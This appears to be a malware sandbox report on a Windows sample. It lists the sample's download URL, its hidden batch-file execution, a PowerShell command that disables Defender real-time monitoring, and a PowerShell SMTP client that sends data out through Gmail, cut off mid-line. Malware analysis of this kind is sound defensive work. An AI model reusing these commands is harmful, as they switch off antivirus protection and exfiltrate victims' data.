Technical Information
- http://be#####ductsreviews.cf/laz.exa as %temp%\proc.exe
- %TEMP%\6844.tmp\6854.bat
- %TEMP%\6844.tmp\6854.bat
- 'sm##.gmail.com':587
- DNS ASK be#####ductsreviews.cf
- DNS ASK sm##.gmail.com
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\6844.tmp\6854.bat <Full path to file>"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\6844.tmp\6854.bat <Full path to file>"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableRealtimeMonitoring $true
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $SMTPServer = 'smtp.gmail.com';$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587);$SMTPInfo.EnableSsl = $true;$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('safiniht...